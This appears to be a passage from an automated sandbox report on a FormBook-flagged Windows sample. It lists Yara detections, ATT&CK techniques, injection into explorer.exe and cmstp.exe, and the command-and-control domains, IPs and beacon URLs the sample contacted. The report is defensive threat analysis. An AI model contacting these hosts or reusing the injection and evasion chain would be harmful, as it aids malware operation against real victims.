          Source: explorer.exe, 00000003.00000000.233000722.000000000871F000.00000004.00000001.sdmp, cmstp.exe, 00000004.00000002.477991867.00000000031B0000.00000002.00000001.sdmpBinary or memory string: Shell_TrayWnd
          Source: explorer.exe, 00000003.00000002.478136214.0000000001980000.00000002.00000001.sdmp, cmstp.exe, 00000004.00000002.477991867.00000000031B0000.00000002.00000001.sdmpBinary or memory string: Progman
          Source: explorer.exe, 00000003.00000002.478136214.0000000001980000.00000002.00000001.sdmp, cmstp.exe, 00000004.00000002.477991867.00000000031B0000.00000002.00000001.sdmpBinary or memory string: Progmanlock

          Stealing of Sensitive Information:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 00000001.00000002.248893172.00000000005C0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.219806845.00000000027A0000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.475251727.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.476907995.0000000000C90000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000001.214771183.0000000000400000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.248915082.00000000005F0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.248684354.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.476715752.0000000000930000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0.2.TazxfJHRhq.exe.27a0000.4.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.TazxfJHRhq.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.1.TazxfJHRhq.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.1.TazxfJHRhq.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.TazxfJHRhq.exe.27a0000.4.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.TazxfJHRhq.exe.400000.0.raw.unpack, type: UNPACKEDPE

          Remote Access Functionality:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 00000001.00000002.248893172.00000000005C0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.219806845.00000000027A0000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.475251727.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.476907995.0000000000C90000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000001.214771183.0000000000400000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.248915082.00000000005F0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.248684354.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.476715752.0000000000930000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0.2.TazxfJHRhq.exe.27a0000.4.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.TazxfJHRhq.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.1.TazxfJHRhq.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.1.TazxfJHRhq.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.TazxfJHRhq.exe.27a0000.4.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.TazxfJHRhq.exe.400000.0.raw.unpack, type: UNPACKEDPE

          Mitre Att&ck Matrix

          Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
          Valid AccountsNative API1Path InterceptionProcess Injection612Virtualization/Sandbox Evasion3OS Credential DumpingSecurity Software Discovery141Remote ServicesArchive Collected Data1Exfiltration Over Other Network MediumEncrypted Channel1Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationSystem Shutdown/Reboot1
          Default AccountsShared Modules1Boot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsProcess Injection612LSASS MemoryVirtualization/Sandbox Evasion3Remote Desktop ProtocolClipboard Data1Exfiltration Over BluetoothIngress Tool Transfer3Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
          Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)Deobfuscate/Decode Files or Information1Security Account ManagerProcess Discovery2SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationNon-Application Layer Protocol3Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
          Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Obfuscated Files or Information3NTDSRemote System Discovery1Distributed Component Object ModelInput CaptureScheduled TransferApplication Layer Protocol13SIM Card SwapCarrier Billing Fraud
          Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptSoftware Packing11LSA SecretsFile and Directory Discovery2SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
          Replication Through Removable MediaLaunchdRc.commonRc.commonSteganographyCached Domain CredentialsSystem Information Discovery12VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features

          Behavior Graph

          Hide Legend

          Legend:

          • Process
          • Signature
          • Created File
          • DNS/IP Info
          • Is Dropped
          • Is Windows Process
          • Number of created Registry Values
          • Number of created Files
          • Visual Basic
          • Delphi
          • Java
          • .Net C# or VB.NET
          • C, C++ or other language
          • Is malicious
          • Internet
          behaviorgraph top1 signatures2 2 Behavior Graph ID: 383852 Sample: TazxfJHRhq.exe Startdate: 08/04/2021 Architecture: WINDOWS Score: 100 36 Snort IDS alert for network traffic (e.g. based on Emerging Threat rules) 2->36 38 Found malware configuration 2->38 40 Malicious sample detected (through community Yara rule) 2->40 42 4 other signatures 2->42 10 TazxfJHRhq.exe 18 2->10         started        process3 file4 28 C:\Users\user\AppData\...\i9y7dp4bi0ysdq.dll, PE32 10->28 dropped 52 Detected unpacking (changes PE section rights) 10->52 54 Maps a DLL or memory area into another process 10->54 56 Tries to detect virtualization through RDTSC time measurements 10->56 58 Contains functionality to prevent local Windows debugging 10->58 14 TazxfJHRhq.exe 10->14         started        signatures5 process6 signatures7 60 Modifies the context of a thread in another process (thread injection) 14->60 62 Maps a DLL or memory area into another process 14->62 64 Sample uses process hollowing technique 14->64 66 Queues an APC in another process (thread injection) 14->66 17 explorer.exe 14->17 injected process8 dnsIp9 30 usinggroovefunnels.com 192.185.48.194, 49745, 80 UNIFIEDLAYER-AS-1US United States 17->30 32 www.de-knutselkeet.com 188.93.150.75, 49740, 80 SIGNET-ASSignetBVNL Netherlands 17->32 34 20 other IPs or domains 17->34 44 System process connects to network (likely due to code injection or exploit) 17->44 21 cmstp.exe 17->21         started        signatures10 process11 signatures12 46 Modifies the context of a thread in another process (thread injection) 21->46 48 Maps a DLL or memory area into another process 21->48 50 Tries to detect virtualization through RDTSC time measurements 21->50 24 cmd.exe 1 21->24         started        process13 process14 26 conhost.exe 24->26         started       

          Screenshots

          Thumbnails

          This section contains all screenshots as thumbnails, including those not shown in the slideshow.

          windows-stand

          Antivirus, Machine Learning and Genetic Malware Detection

          Initial Sample

          SourceDetectionScannerLabelLink
          TazxfJHRhq.exe15%VirustotalBrowse
          TazxfJHRhq.exe25%ReversingLabsWin32.Trojan.Wacatac

          Dropped Files

          No Antivirus matches

          Unpacked PE Files

          SourceDetectionScannerLabelLinkDownload
          1.2.TazxfJHRhq.exe.400000.0.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
          4.2.cmstp.exe.4af7960.5.unpack100%AviraTR/Patched.Ren.GenDownload File
          1.1.TazxfJHRhq.exe.400000.0.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
          0.2.TazxfJHRhq.exe.73790000.5.unpack100%AviraHEUR/AGEN.1131513Download File
          0.2.TazxfJHRhq.exe.27a0000.4.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
          4.2.cmstp.exe.6bd538.1.unpack100%AviraTR/Patched.Ren.GenDownload File

          Domains

          SourceDetectionScannerLabelLink
          www.jcernadas.com0%VirustotalBrowse
          www.de-knutselkeet.com0%VirustotalBrowse

          URLs

          SourceDetectionScannerLabelLink
          http://www.autotrafficbot.com/evpn/?JDK8ix=rbKZoqFNxKUJa45rmf723j5e1+/Af1Vmd22uFdYYwCe+W7Lpy/kHCEK0lxAuMCiY39Cm&w4=jFNp36Ihu0%Avira URL Cloudsafe
          http://www.jamessicilia.com/evpn/?JDK8ix=fhrZBjxaI0WDrOMMLB9i/eTcrXrQxugx+jgojm7BAd6fBe64JiOWliSCzfUjPirJzJCm&w4=jFNp36Ihu0%Avira URL Cloudsafe
          http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
          http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
          http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
          http://www.kinfet.com/evpn/?JDK8ix=tTQY57yJV1PB58vhZsfw1idcR39uzoBhuFhBLA0LfuUY3fYfkSmldauzSZkrcgPEdi+f&w4=jFNp36Ihu0%Avira URL Cloudsafe
          http://www.physicalrobot.com/evpn/?JDK8ix=mJ1WicGgYxGiPfNmi48PwwH9NxkuMiIXMjFvraRfIBMfYxjrtIxgIRAmB9RzgRW7JS2o&w4=jFNp36Ihu0%Avira URL Cloudsafe
          http://www.zhuledao.com/evpn/?JDK8ix=eugAyVbFjTGCbHTU5QCJaxOKGF+rVHXRgES2jcHdoUQlFxVgByKSQwjGascFDT08oG3Y&w4=jFNp36Ihu0%Avira URL Cloudsafe
          http://www.theholisticbirthco.com/evpn/?JDK8ix=x0ZJTajXylflf9w1AOLp4z6MEeP0j5bmDWx3E2oNmzw2lecwih58OZgaRC+Q9k1hI2JG&w4=jFNp36Ihu100%Avira URL Cloudmalware
          http://www.tiro.com0%URL Reputationsafe
          http://www.tiro.com0%URL Reputationsafe
          http://www.tiro.com0%URL Reputationsafe
          www.autotrafficbot.com/evpn/0%Avira URL Cloudsafe
          http://www.goodfont.co.kr0%URL Reputationsafe
          http://www.goodfont.co.kr0%URL Reputationsafe
          http://www.goodfont.co.kr0%URL Reputationsafe
          http://www.jcernadas.com/evpn/?JDK8ix=vuWMxfkh+6vmXF1oy+zIqCJtkAbujMYD9B0ur5oCOxuFSx86Hqk4MPW+e95bZxU45kLf&w4=jFNp36Ihu100%Avira URL Cloudmalware
          http://www.curiosityisthecurebook.com/evpn/?JDK8ix=lIAMQw8Bc5WvbtZzc5MVHUptsiPc1Sl8tBJqhUvlbuUAA7ypaYYvmQWduCHy/+CL3sQ0&w4=jFNp36Ihu0%Avira URL Cloudsafe
          http://www.carterandcone.coml0%URL Reputationsafe
          http://www.carterandcone.coml0%URL Reputationsafe
          http://www.carterandcone.coml0%URL Reputationsafe
          http://www.sajatypeworks.com0%URL Reputationsafe
          http://www.sajatypeworks.com0%URL Reputationsafe
          http://www.sajatypeworks.com0%URL Reputationsafe
          http://www.typography.netD0%URL Reputationsafe
          http://www.typography.netD0%URL Reputationsafe
          http://www.typography.netD0%URL Reputationsafe
          http://www.de-knutselkeet.com/evpn/?JDK8ix=SbzT885gMwI0SrecOCVR7+X63g3QiQnq4cO3Mq/wdHuk7Bui5+S2HJ4sI04qlEXUDlVA&w4=jFNp36Ihu0%Avira URL Cloudsafe
          http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
          http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
          http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
          http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
          http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
          http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
          http://fontfabrik.com0%URL Reputationsafe
          http://fontfabrik.com0%URL Reputationsafe
          http://fontfabrik.com0%URL Reputationsafe
          http://www.founder.com.cn/cn0%URL Reputationsafe
          http://www.founder.com.cn/cn0%URL Reputationsafe
          http://www.founder.com.cn/cn0%URL Reputationsafe
          http://www.productsoffholland.com/evpn/?JDK8ix=0M6ZQgL8IcDyCwomro3oU0+S4lgLLFgc0WEYasg9Je1ZokoU9qr9vbqVIYlP2JKTB372&w4=jFNp36Ihu0%Avira URL Cloudsafe
          http://bitly.ws/9qZUevpn/?JDK8ix=ISts4gbMhqyuTmKrSHZmognB97NvFE2BZp5yYtc0d8I84ULtNRTPjTWlODLK7CpkytN0%Avira URL Cloudsafe
          http://www.markmalls.com/evpn/?JDK8ix=KkWhScBkby78tLALzdAz8CnCjb47jVkq+/iIMgqrMbFUrtE+6VX7P3g+12tQT1WZakud&w4=jFNp36Ihu0%Avira URL Cloudsafe
          http://www.jiyu-kobo.co.jp/0%URL Reputationsafe
          http://www.jiyu-kobo.co.jp/0%URL Reputationsafe
          http://www.jiyu-kobo.co.jp/0%URL Reputationsafe
          http://www.usinggroovefunnels.com/evpn/?JDK8ix=ISts4gbMhqyuTmKrSHZmognB97NvFE2BZp5yYtc0d8I84ULtNRTPjTWlODLK7CpkytNF&w4=jFNp36Ihu100%Avira URL Cloudmalware
          http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
          http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
          http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
          http://www.cgpizza.net/evpn/?JDK8ix=uC/MtWgv+YrXZeFWxw8c+UMLGaJCPPY/UiwLcWwP6A/e3Dk62IKxdmGhKI0+YBSelN0N&w4=jFNp36Ihu0%Avira URL Cloudsafe
          http://www.sandoll.co.kr0%URL Reputationsafe
          http://www.sandoll.co.kr0%URL Reputationsafe
          http://www.sandoll.co.kr0%URL Reputationsafe
          http://www.physicalrobot.com/0%Avira URL Cloudsafe
          http://www.urwpp.deDPlease0%URL Reputationsafe
          http://www.urwpp.deDPlease0%URL Reputationsafe
          http://www.urwpp.deDPlease0%URL Reputationsafe
          http://www.zhongyicts.com.cn0%URL Reputationsafe
          http://www.zhongyicts.com.cn0%URL Reputationsafe
          http://www.zhongyicts.com.cn0%URL Reputationsafe
          http://www.sakkal.com0%URL Reputationsafe
          http://www.sakkal.com0%URL Reputationsafe
          http://www.sakkal.com0%URL Reputationsafe
          http://www.tor-one.com/evpn/?JDK8ix=MYo3qtR4MoTJM9eEEEQJY+2owLrirHbqorePLbwYxji+asNtirv2kfx8Flc200WiuFJj&w4=jFNp36Ihu0%Avira URL Cloudsafe
          http://www.physicalrobot.com0%Avira URL Cloudsafe

          Domains and IPs

          Contacted Domains

          NameIPActiveMaliciousAntivirus DetectionReputation
          www.jcernadas.com
          		52.216.152.43
          		truetrueunknown
          www.de-knutselkeet.com
          		188.93.150.75
          		truetrueunknown
          www.markmalls.com
          		35.240.239.44
          		truefalse
            		unknown
            curiosityisthecurebook.com
            		34.102.136.180
            		truefalse
              		unknown
              usinggroovefunnels.com
              		192.185.48.194
              		truetrue
                		unknown
                www.jamessicilia.com
                		208.91.197.91
                		truetrue
                  		unknown
                  shops.myshopify.com
                  		23.227.38.74
                  		truetrue
                    		unknown
                    www.tor-one.com
                    		80.67.16.8
                    		truetrue
                      		unknown
                      cgpizza.net
                      		34.102.136.180
                      		truefalse
                        		unknown
                        prod-sav-park-lb01-1919960993.us-east-2.elb.amazonaws.com
                        		52.15.160.167
                        		truefalse
                          		high
                          www.physicalrobot.com
                          		52.58.78.16
                          		truetrue
                            		unknown
                            www.autotrafficbot.com
                            		45.88.202.115
                            		truetrue
                              		unknown
                              productsoffholland.com
                              		45.82.188.40
                              		truetrue
                                		unknown
                                ext-sq.squarespace.com
                                		198.185.159.144
                                		truefalse
                                  		high
                                  www.theholisticbirthco.com
                                  		unknown
                                  		unknowntrue
                                    		unknown
                                    www.productsoffholland.com
                                    		unknown
                                    		unknowntrue
                                      		unknown
                                      www.kinfet.com
                                      		unknown
                                      		unknowntrue
                                        		unknown
                                        www.glgshopbd.com
                                        		unknown
                                        		unknowntrue
                                          		unknown
                                          www.zhuledao.com
                                          		unknown
                                          		unknowntrue
                                            		unknown
                                            www.cgpizza.net
                                            		unknown
                                            		unknowntrue
                                              		unknown
                                              www.curiosityisthecurebook.com
                                              		unknown
                                              		unknowntrue
                                                		unknown
                                                www.usinggroovefunnels.com
                                                		unknown
                                                		unknowntrue
                                                  		unknown

                                                  Contacted URLs

                                                  NameMaliciousAntivirus DetectionReputation
                                                  http://www.autotrafficbot.com/evpn/?JDK8ix=rbKZoqFNxKUJa45rmf723j5e1+/Af1Vmd22uFdYYwCe+W7Lpy/kHCEK0lxAuMCiY39Cm&w4=jFNp36Ihutrue
                                                  • Avira URL Cloud: safe
                                                  		unknown
                                                  http://www.jamessicilia.com/evpn/?JDK8ix=fhrZBjxaI0WDrOMMLB9i/eTcrXrQxugx+jgojm7BAd6fBe64JiOWliSCzfUjPirJzJCm&w4=jFNp36Ihutrue
                                                  • Avira URL Cloud: safe
                                                  		unknown
                                                  http://www.kinfet.com/evpn/?JDK8ix=tTQY57yJV1PB58vhZsfw1idcR39uzoBhuFhBLA0LfuUY3fYfkSmldauzSZkrcgPEdi+f&w4=jFNp36Ihutrue
                                                  • Avira URL Cloud: safe
                                                  		unknown
                                                  http://www.physicalrobot.com/evpn/?JDK8ix=mJ1WicGgYxGiPfNmi48PwwH9NxkuMiIXMjFvraRfIBMfYxjrtIxgIRAmB9RzgRW7JS2o&w4=jFNp36Ihutrue
                                                  • Avira URL Cloud: safe
                                                  		unknown
                                                  http://www.zhuledao.com/evpn/?JDK8ix=eugAyVbFjTGCbHTU5QCJaxOKGF+rVHXRgES2jcHdoUQlFxVgByKSQwjGascFDT08oG3Y&w4=jFNp36Ihutrue
                                                  • Avira URL Cloud: safe
                                                  		unknown
                                                  http://www.theholisticbirthco.com/evpn/?JDK8ix=x0ZJTajXylflf9w1AOLp4z6MEeP0j5bmDWx3E2oNmzw2lecwih58OZgaRC+Q9k1hI2JG&w4=jFNp36Ihutrue
                                                  • Avira URL Cloud: malware
                                                  		unknown
                                                  www.autotrafficbot.com/evpn/true
                                                  • Avira URL Cloud: safe
                                                  		low
                                                  http://www.jcernadas.com/evpn/?JDK8ix=vuWMxfkh+6vmXF1oy+zIqCJtkAbujMYD9B0ur5oCOxuFSx86Hqk4MPW+e95bZxU45kLf&w4=jFNp36Ihutrue
                                                  • Avira URL Cloud: malware
                                                  		unknown
                                                  http://www.curiosityisthecurebook.com/evpn/?JDK8ix=lIAMQw8Bc5WvbtZzc5MVHUptsiPc1Sl8tBJqhUvlbuUAA7ypaYYvmQWduCHy/+CL3sQ0&w4=jFNp36Ihufalse
                                                  • Avira URL Cloud: safe
                                                  		unknown
                                                  http://www.de-knutselkeet.com/evpn/?JDK8ix=SbzT885gMwI0SrecOCVR7+X63g3QiQnq4cO3Mq/wdHuk7Bui5+S2HJ4sI04qlEXUDlVA&w4=jFNp36Ihutrue
                                                  • Avira URL Cloud: safe
                                                  		unknown
                                                  http://www.productsoffholland.com/evpn/?JDK8ix=0M6ZQgL8IcDyCwomro3oU0+S4lgLLFgc0WEYasg9Je1ZokoU9qr9vbqVIYlP2JKTB372&w4=jFNp36Ihutrue
                                                  • Avira URL Cloud: safe
                                                  		unknown
                                                  http://www.markmalls.com/evpn/?JDK8ix=KkWhScBkby78tLALzdAz8CnCjb47jVkq+/iIMgqrMbFUrtE+6VX7P3g+12tQT1WZakud&w4=jFNp36Ihufalse
                                                  • Avira URL Cloud: safe
                                                  		unknown
                                                  http://www.usinggroovefunnels.com/evpn/?JDK8ix=ISts4gbMhqyuTmKrSHZmognB97NvFE2BZp5yYtc0d8I84ULtNRTPjTWlODLK7CpkytNF&w4=jFNp36Ihutrue
                                                  • Avira URL Cloud: malware
                                                  		unknown
                                                  http://www.cgpizza.net/evpn/?JDK8ix=uC/MtWgv+YrXZeFWxw8c+UMLGaJCPPY/UiwLcWwP6A/e3Dk62IKxdmGhKI0+YBSelN0N&w4=jFNp36Ihufalse
                                                  • Avira URL Cloud: safe
                                                  		unknown
                                                  http://www.tor-one.com/evpn/?JDK8ix=MYo3qtR4MoTJM9eEEEQJY+2owLrirHbqorePLbwYxji+asNtirv2kfx8Flc200WiuFJj&w4=jFNp36Ihutrue
                                                  • Avira URL Cloud: safe
                                                  		unknown

                                                  URLs from Memory and Binaries

                                                  NameSourceMaliciousAntivirus DetectionReputation
                                                  http://www.apache.org/licenses/LICENSE-2.0explorer.exe, 00000003.00000000.233379152.0000000008B46000.00000002.00000001.sdmpfalse
                                                    		high
                                                    http://www.fontbureau.comexplorer.exe, 00000003.00000000.233379152.0000000008B46000.00000002.00000001.sdmpfalse
                                                      		high
                                                      http://www.fontbureau.com/designersGexplorer.exe, 00000003.00000000.233379152.0000000008B46000.00000002.00000001.sdmpfalse
                                                        		high
                                                        http://www.fontbureau.com/designers/?explorer.exe, 00000003.00000000.233379152.0000000008B46000.00000002.00000001.sdmpfalse
                                                          		high
                                                          http://www.founder.com.cn/cn/bTheexplorer.exe, 00000003.00000000.233379152.0000000008B46000.00000002.00000001.sdmpfalse
                                                          • URL Reputation: safe
                                                          • URL Reputation: safe
                                                          • URL Reputation: safe
                                                          		unknown
                                                          http://www.fontbureau.com/designers?explorer.exe, 00000003.00000000.233379152.0000000008B46000.00000002.00000001.sdmpfalse
                                                            		high
                                                            http://www.tiro.comexplorer.exe, 00000003.00000000.233379152.0000000008B46000.00000002.00000001.sdmpfalse
                                                            • URL Reputation: safe
                                                            • URL Reputation: safe
                                                            • URL Reputation: safe
                                                            		unknown
                                                            http://www.fontbureau.com/designersexplorer.exe, 00000003.00000000.233379152.0000000008B46000.00000002.00000001.sdmpfalse
                                                              		high
                                                              http://www.goodfont.co.krexplorer.exe, 00000003.00000000.233379152.0000000008B46000.00000002.00000001.sdmpfalse
                                                              • URL Reputation: safe
                                                              • URL Reputation: safe
                                                              • URL Reputation: safe
                                                              		unknown
                                                              http://www.carterandcone.comlexplorer.exe, 00000003.00000000.233379152.0000000008B46000.00000002.00000001.sdmpfalse
                                                              • URL Reputation: safe
                                                              • URL Reputation: safe
                                                              • URL Reputation: safe
                                                              		unknown
                                                              http://www.sajatypeworks.comexplorer.exe, 00000003.00000000.233379152.0000000008B46000.00000002.00000001.sdmpfalse
                                                              • URL Reputation: safe
                                                              • URL Reputation: safe
                                                              • URL Reputation: safe
                                                              		unknown
                                                              http://www.typography.netDexplorer.exe, 00000003.00000000.233379152.0000000008B46000.00000002.00000001.sdmpfalse
                                                              • URL Reputation: safe
                                                              • URL Reputation: safe
                                                              • URL Reputation: safe
                                                              		unknown
                                                              http://www.fontbureau.com/designers/cabarga.htmlNexplorer.exe, 00000003.00000000.233379152.0000000008B46000.00000002.00000001.sdmpfalse
                                                                		high
                                                                http://www.founder.com.cn/cn/cTheexplorer.exe, 00000003.00000000.233379152.0000000008B46000.00000002.00000001.sdmpfalse
                                                                • URL Reputation: safe
                                                                • URL Reputation: safe
                                                                • URL Reputation: safe
                                                                		unknown
                                                                http://www.galapagosdesign.com/staff/dennis.htmexplorer.exe, 00000003.00000000.233379152.0000000008B46000.00000002.00000001.sdmpfalse
                                                                • URL Reputation: safe
                                                                • URL Reputation: safe
                                                                • URL Reputation: safe
                                                                		unknown
                                                                http://fontfabrik.comexplorer.exe, 00000003.00000000.233379152.0000000008B46000.00000002.00000001.sdmpfalse
                                                                • URL Reputation: safe
                                                                • URL Reputation: safe
                                                                • URL Reputation: safe
                                                                		unknown
                                                                http://www.founder.com.cn/cnexplorer.exe, 00000003.00000000.233379152.0000000008B46000.00000002.00000001.sdmpfalse
                                                                • URL Reputation: safe
                                                                • URL Reputation: safe
                                                                • URL Reputation: safe
                                                                		unknown
                                                                http://www.fontbureau.com/designers/frere-jones.htmlexplorer.exe, 00000003.00000000.233379152.0000000008B46000.00000002.00000001.sdmpfalse
                                                                  		high
                                                                  http://bitly.ws/9qZUevpn/?JDK8ix=ISts4gbMhqyuTmKrSHZmognB97NvFE2BZp5yYtc0d8I84ULtNRTPjTWlODLK7CpkytNcmstp.exe, 00000004.00000002.479835773.0000000004C72000.00000004.00000001.sdmpfalse
                                                                  • Avira URL Cloud: safe
                                                                  		unknown
                                                                  http://www.jiyu-kobo.co.jp/explorer.exe, 00000003.00000000.233379152.0000000008B46000.00000002.00000001.sdmpfalse
                                                                  • URL Reputation: safe
                                                                  • URL Reputation: safe
                                                                  • URL Reputation: safe
                                                                  		unknown
                                                                  http://www.galapagosdesign.com/DPleaseexplorer.exe, 00000003.00000000.233379152.0000000008B46000.00000002.00000001.sdmpfalse
                                                                  • URL Reputation: safe
                                                                  • URL Reputation: safe
                                                                  • URL Reputation: safe
                                                                  		unknown
                                                                  http://www.fontbureau.com/designers8explorer.exe, 00000003.00000000.233379152.0000000008B46000.00000002.00000001.sdmpfalse
                                                                    		high
                                                                    http://www.fonts.comexplorer.exe, 00000003.00000000.233379152.0000000008B46000.00000002.00000001.sdmpfalse
                                                                      		high
                                                                      http://www.sandoll.co.krexplorer.exe, 00000003.00000000.233379152.0000000008B46000.00000002.00000001.sdmpfalse
                                                                      • URL Reputation: safe
                                                                      • URL Reputation: safe
                                                                      • URL Reputation: safe
                                                                      		unknown
                                                                      http://www.physicalrobot.com/cmstp.exe, 00000004.00000002.479835773.0000000004C72000.00000004.00000001.sdmpfalse
                                                                      • Avira URL Cloud: safe
                                                                      		unknown
                                                                      http://www.urwpp.deDPleaseexplorer.exe, 00000003.00000000.233379152.0000000008B46000.00000002.00000001.sdmpfalse
                                                                      • URL Reputation: safe
                                                                      • URL Reputation: safe
                                                                      • URL Reputation: safe
                                                                      		unknown
                                                                      http://www.zhongyicts.com.cnexplorer.exe, 00000003.00000000.233379152.0000000008B46000.00000002.00000001.sdmpfalse
                                                                      • URL Reputation: safe
                                                                      • URL Reputation: safe
                                                                      • URL Reputation: safe
                                                                      		unknown
                                                                      http://www.sakkal.comexplorer.exe, 00000003.00000000.233379152.0000000008B46000.00000002.00000001.sdmpfalse
                                                                      • URL Reputation: safe
                                                                      • URL Reputation: safe
                                                                      • URL Reputation: safe
                                                                      		unknown
                                                                      http://www.physicalrobot.comcmstp.exe, 00000004.00000002.479835773.0000000004C72000.00000004.00000001.sdmpfalse
                                                                      • Avira URL Cloud: safe
                                                                      		unknown

                                                                      Contacted IPs

                                                                      • No. of IPs < 25%
                                                                      • 25% < No. of IPs < 50%
                                                                      • 50% < No. of IPs < 75%
                                                                      • 75% < No. of IPs

                                                                      Public

                                                                      IPDomainCountryFlagASNASN NameMalicious
                                                                      52.58.78.16
                                                                      		www.physicalrobot.comUnited States
                                                                      		16509AMAZON-02UStrue
                                                                      80.67.16.8
                                                                      		www.tor-one.comGermany
                                                                      		34011GD-EMEA-DC-CGN1DEtrue
                                                                      35.240.239.44
                                                                      		www.markmalls.comUnited States
                                                                      		15169GOOGLEUSfalse
                                                                      45.88.202.115
                                                                      		www.autotrafficbot.comSwitzerland
                                                                      		34962ANONYMIZEEpikNetworkCHtrue
                                                                      23.227.38.74
                                                                      		shops.myshopify.comCanada
                                                                      		13335CLOUDFLARENETUStrue
                                                                      198.185.159.144
                                                                      		ext-sq.squarespace.comUnited States
                                                                      		53831SQUARESPACEUSfalse
                                                                      192.185.48.194
                                                                      		usinggroovefunnels.comUnited States
                                                                      		46606UNIFIEDLAYER-AS-1UStrue
                                                                      208.91.197.91
                                                                      		www.jamessicilia.comVirgin Islands (BRITISH)
                                                                      		40034CONFLUENCE-NETWORK-INCVGtrue
                                                                      188.93.150.75
                                                                      		www.de-knutselkeet.comNetherlands
                                                                      		49685SIGNET-ASSignetBVNLtrue
                                                                      34.102.136.180
                                                                      		curiosityisthecurebook.comUnited States
                                                                      		15169GOOGLEUSfalse
                                                                      52.15.160.167
                                                                      		prod-sav-park-lb01-1919960993.us-east-2.elb.amazonaws.comUnited States
                                                                      		16509AMAZON-02USfalse
                                                                      52.216.152.43
                                                                      		www.jcernadas.comUnited States
                                                                      		16509AMAZON-02UStrue
                                                                      45.82.188.40
                                                                      		productsoffholland.comNetherlands
                                                                      		31477DUOCAST-ASNLtrue

                                                                      General Information

                                                                      Joe Sandbox Version:31.0.0 Emerald
                                                                      Analysis ID:383852
                                                                      Start date:08.04.2021
                                                                      Start time:11:08:26
                                                                      Joe Sandbox Product:CloudBasic
                                                                      Overall analysis duration:0h 11m 34s
                                                                      Hypervisor based Inspection enabled:false
                                                                      Report type:light
                                                                      Sample file name:TazxfJHRhq.exe
                                                                      Cookbook file name:default.jbs
                                                                      Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                                                      Number of analysed new started processes analysed:28
                                                                      Number of new started drivers analysed:0
                                                                      Number of existing processes analysed:0
                                                                      Number of existing drivers analysed:0
                                                                      Number of injected processes analysed:1
                                                                      Technologies:
                                                                      • HCA enabled
                                                                      • EGA enabled
                                                                      • HDC enabled
                                                                      • AMSI enabled
                                                                      Analysis Mode:default
                                                                      Analysis stop reason:Timeout
                                                                      Detection:MAL
                                                                      Classification:mal100.troj.evad.winEXE@7/3@15/13
                                                                      EGA Information:Failed
                                                                      HDC Information:
                                                                      • Successful, ratio: 24% (good quality ratio 22.1%)
                                                                      • Quality average: 76%
                                                                      • Quality standard deviation: 30.2%
                                                                      HCA Information:
                                                                      • Successful, ratio: 92%
                                                                      • Number of executed functions: 0
                                                                      • Number of non-executed functions: 0
